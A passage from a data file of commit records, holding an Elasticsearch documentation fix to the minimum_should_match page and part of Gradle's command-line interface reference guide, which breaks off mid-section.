ticsearch,springning\/elasticsearch,ouyangkongtong\/elasticsearch,adrianbk\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,thecocce\/elasticsearch,sscarduzio\/elasticsearch,mkis-\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,KimTaehee\/elasticsearch,18098924759\/elasticsearch,HonzaKral\/elasticsearch,mute\/elasticsearch,alexbrasetvik\/elasticsearch,djschny\/elasticsearch,MaineC\/elasticsearch,hydro2k\/elasticsearch,PhaedrusTheGreek\/elasticsearch,NBSW\/elasticsearch,easonC\/elasticsearch,ivansun1010\/elasticsearch,koxa29\/elasticsearch,mm0\/elasticsearch,nomoa\/elasticsearch,Charlesdong\/elasticsearch,jpountz\/elasticsearch,mrorii\/elasticsearch,rmuir\/elasticsearch,tcucchietti\/elasticsearch,HarishAtGitHub\/elasticsearch,polyfractal\/elasticsearch,diendt\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,sc0ttkclark\/elasticsearch,ricardocerq\/elasticsearch,milodky\/elasticsearch,areek\/elasticsearch,umeshdangat\/elasticsearch,amaliujia\/elasticsearch,knight1128\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,luiseduardohdbackup\/elasticsearch,kalburgimanjunath\/elasticsearch,jimhooker2002\/elasticsearch,Asimov4\/elasticsearch,HarishAtGitHub\/elasticsearch,Widen\/elasticsearch,loconsolutions\/elasticsearch,hydro2k\/elasticsearch,jsgao0\/elasticsearch,cwurm\/elasticsearch,kingaj\/elasticsearch,lydonchandra\/elasticsearch,combinatorist\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,adrianbk\/elasticsearch,bawse\/elasticsearch,HarishAtGitHub\/elasticsearch,alexbrasetvik\/elasticsearch,qwerty4030\/elasticsearch,Brijeshrpatel9\/elasticsearch,Liziyao\/elasticsearch,loconsolutions\/elasticsearch,Shepard1212\/elasticsearch,clintongormley\/elasticsearch,scorpionvicky\/elasticsearch,beiske\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,coding0011\/elasticsearch,ckclark\/elasticsearch,thecocce\/elasticsearch,apepper\/elasticsearch,iacdingping\/elasticsearch,lzo\/elasticsearch-1,iantruslove\/elasticsearch,kimimj\/elasticsearch,kcompher\/elasticsearch,ouyangkongtong\/elasticsearch","old_file":"docs\/reference\/query-dsl\/queries\/minimum-should-match.asciidoc","new_file":"docs\/reference\/query-dsl\/queries\/minimum-should-match.asciidoc","new_contents":"[[query-dsl-minimum-should-match]]\n=== Minimum Should Match\n\nThe `minimum_should_match` parameter possible values:\n\n[cols=\"<,<,<\",options=\"header\",]\n|=======================================================================\n|Type |Example |Description\n|Integer |`3` |Indicates a fixed value regardless of the number of\noptional clauses.\n\n|Negative integer |`-2` |Indicates that the total number of optional\nclauses, minus this number should be mandatory.\n\n|Percentage |`75%` |Indicates that this percent of the total number of\noptional clauses are necessary. The number computed from the percentage\nis rounded down and used as the minimum.\n\n|Negative percentage |`-25%` |Indicates that this percent of the total\nnumber of optional clauses can be missing. The number computed from the\npercentage is rounded down, before being subtracted from the total to\ndetermine the minimum.\n\n|Combination |`3<90%` |A positive integer, followed by the less-than\nsymbol, followed by any of the previously mentioned specifiers is a\nconditional specification. It indicates that if the number of optional\nclauses is equal to (or less than) the integer, they are all required,\nbut if it's greater than the integer, the specification applies. 
In this\nexample: if there are 1 to 3 clauses they are all required, but for 4 or\nmore clauses only 90% are required.\n\n|Multiple combinations |`2<-25% 9<-3` |Multiple conditional\nspecifications can be separated by spaces, each one only being valid for\nnumbers greater than the one before it. In this example: if there are 1\nor 2 clauses both are required, if there are 3-9 clauses all but 25% are\nrequired, and if there are more than 9 clauses, all but three are\nrequired.\n|=======================================================================\n\n*NOTE:*\n\nWhen dealing with percentages, negative values can be used to get\ndifferent behavior in edge cases. 75% and -25% mean the same thing when\ndealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are\nrequired, but -25% means 4 are required.\n\nIf the calculations based on the specification determine that no\noptional clauses are needed, the usual rules about BooleanQueries still\napply at search time (a BooleanQuery containing no required clauses must\nstill match at least one optional clause).\n\nNo matter what number the calculation arrives at, a value greater than\nthe number of optional clauses, or a value less than 1 will never be\nused (i.e. no matter how low or how high the result of the\ncalculation is, the minimum number of required matches will never be lower\nthan 1 or greater than the number of clauses).\n","old_contents":"[[query-dsl-minimum-should-match]]\n=== Minimum Should Match\n\nThe `minimum_should_match` parameter possible values:\n\n[cols=\"<,<,<\",options=\"header\",]\n|=======================================================================\n|Type |Example |Description\n|Integer |`3` |Indicates a fixed value regardless of the number of\noptional clauses.\n\n|Negative integer |`-2` |Indicates that the total number of optional\nclauses, minus this number should be mandatory.\n\n|Percentage |`75%` |Indicates that this percent of the total number of\noptional clauses are necessary. The number computed from the percentage\nis rounded down and used as the minimum.\n\n|Negative percentage |`-25%` |Indicates that this percent of the total\nnumber of optional clauses can be missing. The number computed from the\npercentage is rounded down, before being subtracted from the total to\ndetermine the minimum.\n\n|Combination |`3<90%` |A positive integer, followed by the less-than\nsymbol, followed by any of the previously mentioned specifiers is a\nconditional specification. It indicates that if the number of optional\nclauses is equal to (or less than) the integer, they are all required,\nbut if it's greater than the integer, the specification applies. In this\nexample: if there are 1 to 3 clauses they are all required, but for 4 or\nmore clauses only 90% are required.\n\n|Multiple combinations |`2<-25 9<-3` |Multiple conditional\nspecifications can be separated by spaces, each one only being valid for\nnumbers greater than the one before it. In this example: if there are 1\nor 2 clauses both are required, if there are 3-9 clauses all but 25% are\nrequired, and if there are more than 9 clauses, all but three are\nrequired.\n|=======================================================================\n\n*NOTE:*\n\nWhen dealing with percentages, negative values can be used to get\ndifferent behavior in edge cases. 
75% and -25% mean the same thing when\ndealing with 4 clauses, but when dealing with 5 clauses 75% means 3 are\nrequired, but -25% means 4 are required.\n\nIf the calculations based on the specification determine that no\noptional clauses are needed, the usual rules about BooleanQueries still\napply at search time (a BooleanQuery containing no required clauses must\nstill match at least one optional clause)\n\nNo matter what number the calculation arrives at, a value greater than\nthe number of optional clauses, or a value less than 1 will never be\nused. (ie: no matter how low or how high the result of the calculation\nresult is, the minimum number of required matches will never be lower\nthan 1 or greater than the number of clauses.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6211ec989a4f50d659b93ef1167e4558df11dcc5","subject":"Documentation rewording","message":"Documentation rewording\n\nCo-authored-by: Octavia Togami <19e24b89572cf32e772a4df489d8679fbb904d05@gmail.com>\nSigned-off-by: Marcin Mielnicki <df0fc51f55bb3fb4ccd695f6dbaea2fe3e086b4f@gmail.com>\n","repos":"blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/reference\/command_line_interface.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference of executing and customizing Gradle use of a command-line or when writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] [--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options, have short option equivalents. 
The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\nIn order to execute a task called \"myTask\" on the root project, type:\n----\n$ gradle :myTask\n----\n\nThis will run the single \"myTask\" and also all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,task dependencies>>.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\n\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name.\nThe following are equivalent _when run from the root project_:\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for _all_ subprojects by using a task _selector_ that consists of the task name only.\nFor example, this will run the \"test\" task for all subprojects when invoked from the root project directory:\n----\n$ gradle test\n----\n\n[NOTE]\n====\nSome task selectors, like `help` or `dependencies`, will only run the task on the project they are invoked on and not on all the subprojects.\nThe main motivation for this is that these tasks print out information that would be hard to process if it combined the information from all projects.\n====\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. 
The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. 
For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/scans.gradle.com\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. 
You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output are available in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match the specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter.\n
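\nFor instance, a minimal sketch, assuming the `compileClasspath` configuration contributed by the Java plugin:\n\n----\n$ gradle dependencies --configuration compileClasspath\n----\n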
\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.debug.port=(port number)`::\nSpecifies the port number to listen on when debug is enabled. _Default is `5005`._\n\n`-Dorg.gradle.debug.server=true`::\nIf set to `true` and debugging is enabled, Gradle will run the build with the socket-attach mode of the debugger. Otherwise, the socket-listen mode is used.\n\n`-Dorg.gradle.debug.suspend=true`::\nWhen set to `true` and debugging is enabled, the JVM running Gradle will suspend until a debugger is attached.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about <<performance.adoc#performance_gradle,improving performance of Gradle builds here>>.\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_configuration_and_execution.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_configuration_and_execution.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nWhen enabled Gradle re-uses information it collects about the file system between builds.\n_Enabled by default on operating systems where Gradle supports this feature._\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if it is not running, or if the existing daemon is busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n
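\nAs a quick illustration, the following invocations are two ways of running at the info level (the `test` task here is just a placeholder):\n\n----\n$ gradle test --info\n$ gradle test -Dorg.gradle.logging.level=info\n----\n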
\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. Different modes described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, even when the build process is not attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like `rich`, but output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. Different modes described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n
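\nFor example, to surface every individual warning instead of the summary (assuming a `build` task exists):\n\n----\n$ gradle build --warning-mode=all\n----\n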
\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n[[sec:environment_options]]\n== Environment options\nYou can customize where Gradle looks for build scripts and settings, where it keeps its caches, and other aspects of the build environment through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file` (deprecated)::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`.\n\n`-c`, `--settings-file` (deprecated)::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n
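\nA combined sketch of these environment options (the directory names and the property are hypothetical):\n\n----\n$ gradle --project-dir=my-subproject --gradle-user-home=..\/gradle-home -Dmyprop=myvalue build\n----\n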
\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle build, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware of with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input.
In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic links to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. This means that 